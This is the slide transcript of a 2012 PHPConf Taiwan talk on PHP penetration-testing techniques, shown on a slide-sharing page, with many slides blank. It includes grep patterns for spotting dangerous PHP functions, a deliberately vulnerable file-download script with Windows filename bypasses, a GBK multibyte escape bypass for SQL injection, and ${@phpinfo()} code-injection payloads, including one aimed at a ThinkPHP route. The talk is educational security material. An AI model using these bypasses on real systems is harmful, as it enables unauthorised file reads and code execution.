Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Security in PHP 那些在滲透測試的小技巧

Sponsored · Your Podcast. Everywhere. Effortlessly. Share. Educate. Inspire. Entertain. You do you. We'll handle the rest.
Avatar for Orange Orange
August 21, 2024
0
240

Security in PHP 那些在滲透測試的小技巧

PHPConf Taiwan 2012

Avatar for Orange

Orange

August 21, 2024
Tweet

More Decks by Orange

See All by Orange
Best Practices - The Upload
Avatar for Orange p8361
0
130
網頁安全 Web Security 入門
Avatar for Orange p8361
0
230
Bug Bounty 獎金獵人甘苦談 - 那些年我回報過的漏洞
Avatar for Orange p8361
13
36k
那些 Web Hacking 中的奇技淫巧
Avatar for Orange p8361
16
15k
關於 HITCON CTF 的那些事 之 Web 狗如何在險惡的 CTF 世界中存活?
Avatar for Orange p8361
6
13k
PHPConf 2013 - 矛盾大對決
Avatar for Orange p8361
53
28k
0-Day 輕鬆談 - Happy Fuzzing Internet Explorer
Avatar for Orange p8361
15
12k
駭客看 Django
Avatar for Orange p8361
25
13k

Featured

See All Featured
HDC tutorial
Avatar for Michiel Stock michielstock
1
390
The Director’s Chair: Orchestrating AI for Truly Effective Learning
Avatar for Mike Taylor tmiket
1
99
Mozcon NYC 2025: Stop Losing SEO Traffic
Avatar for Sam Torres samtorres
0
150
エンジニアに許された特別な時間の終わり
Avatar for watany watany
106
230k
Why Mistakes Are the Best Teachers: Turning Failure into a Pathway for Growth
Avatar for Umar Saidu Auna auna
0
55
Un-Boring Meetings
Avatar for Sebastian Deterding codingconduct
0
200
Evolution of real-time – Irina Nazarova, EuRuKo, 2024
Avatar for Irina Nazarova irinanazarova
9
1.2k
SEO in 2025: How to Prepare for the Future of Search
Avatar for Michael King ipullrank
3
3.3k
Sharpening the Axe: The Primacy of Toolmaking
Avatar for Bryan Cantrill bcantrill
46
2.7k
Have SEOs Ruined the Internet? - User Awareness of SEO in 2025
Avatar for Akash Hashmi akashhashmi
0
270
Producing Creativity
Avatar for Steve Smith orderedlist
PRO
348
40k
Measuring Dark Social's Impact On Conversion and Attribution
Avatar for Stephen Akadiri stephenakadiri
1
130

Transcript

  1. 2012/11/03 @ PHPCONF <[email protected]>

  2. • aka Orange • 2009 • 2011 • 2011 AVTOKYO

    • – – Web Security – Windows Vulnerability Exploitation

  3. • CHROOT Security Group • NISRA • case. • Blog

    – http://blog.orange.tw/
  4. None
  5. None
  6. None

  7. ▪▪

  8. None

  9. <?php $url = $_GET['url']; echo urlencode( $url ); ?>

  10. • Low – Sensitive Information Leakage… • Middle – Insecure

    File Download/Access… • High – Local File Inclusion, Code Injection, SQL Inj…
  11. None

  12. • – – –

  13. • showNews.php?id=198 – showNews.php?id=198/1 • checkName.php?u=lala – checkName.php?u=lala%cc' • getFile.php?path=hsu.doc

    – getFile.php?path=./hsu.doc • main.php?module=index – main.php?module[]=index
  14. None
  15. None

  16. 1. Router, Controller URL Mapping 2. 3. 4. DB ORM

    PHP orz

  17. 1. – system exec shell_exec popen eval create_function call_user_func preg_replace…

    2. – _GET _POST _COOKIE _REQUEST _ENV _FILES _SERVER HTTP_RAW_POST_DATA php://input getenv …

  18. • grep -Re – (include|require).+\$ – (eval|create_function|call_user_func|…).+\$ – (system|exec|shell_exec|passthru|…).+\$ –

    (select|insert|update|where|…).+\$ – (file_get_contents|readfile|fopen|…).+\$ – (unserialize|parse_str|…).+\$ – \$\$, $a\(\) – ……

  19. • grep -Re – \$(_GET|_POST|_COOKIE|_REQUEST|_FILES) – \$(_ENV|_SERVER) – getenv –

    HTTP_RAW_POST_DATA – php://input – …

  20. try { …… $trans->commit(); } catch (xxx_adapter_exception $e) { $trans->rollback();

    require_once 'xxx_exceptio$n.class.php' throw new xxx_exception( …… ); }
  21. None
  22. None

  23. <?php $name = $_GET['name']; $name = basename( $name ); if

    ( eregi( "(.php|.conf)$", $name ) ) exit( "Not Allow PHP." ); else readfile( DOCUMENT_ROOT. $name ); ?>

  24. • down.php?name= – config.php – config"php – config.ph> – config.<

    – c>>>>>"< – c<"< Test on PHP 5.4.8 newest stable version (2012/10/17) Original Will be replaced by < * > ? " .
  25. None

  26. • file_get_contents – > php_stream_open_wrapper_ex – > zend_resolve_path – >

    php_resolve_path_for_zend – > php_resolve_path – > tsrm_realpath – > virtual_file_ex – > tsrm_realpath_r
  27. None

  28. • file_get_contents • file_put_contents • file • readfile • phar_file_get_contents

    • include • include_once • require • require_once • fopen • opendir • readdir • mkdir • ……
  29. None

  30. • config.php/. • config.php///. • c>>>>>.</// Works on PHP 5.2.*

    (2012/10/26)
  31. None

  32. • Web Browser PHP Output (HTML) – Cross-Site Scripting •

    DB Management PHP Output (SQL) – SQL Injection

  33. SELECT * FROM [table] WHERE username = 'PHPCONF'

  34. SELECT * FROM [table] WHERE username = 'PHPCONF\''

  35. SELECT * FROM [table] WHERE username = 'PHPCONF%cc\''

  36. Σ( ° △ °|||)︴ Before After PHPCONF PHPCONF PHPCONF' PHPCONF\'

    PHPCONF%80' PHPCONF�\' PHPCONF%cc' PHPCONF岤' 0x81-0xFE 0x40-0x7E 0xA1-0xFE

  37. • addslashes • mysql_escape_string • magic_quote_gpc • Special Cases –

    pdo – mysql_real_escape_st ring
  38. None

  39. • $url = "http://phpconf.tw/2012/"; • $url = "http://phpconf.tw/$year/"; • $url

    = "http://phpconf.tw/{$year}/"; • $url = "http://phpconf.tw/{${phpinfo()}}/"; • $url = "http://phpconf.tw/${@phpinfo()}/";

  40. config.php $dbuser = "root";

  41. config.php $dbuser = "${@phpinfo()}";

  42. $res = preg_replace('@(w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths)); https://orange.tw/index.php?s=module/action/ param1/${@phpinfo()}

  43. Think PHP

  44. None

  45. – – – – – –

  46. • PHP Security – http://blog.php-security.org/ • Oddities of PHP file

    access in Windows®. – http://onsec.ru/onsec.whitepaper-02.eng.pdf
  47. None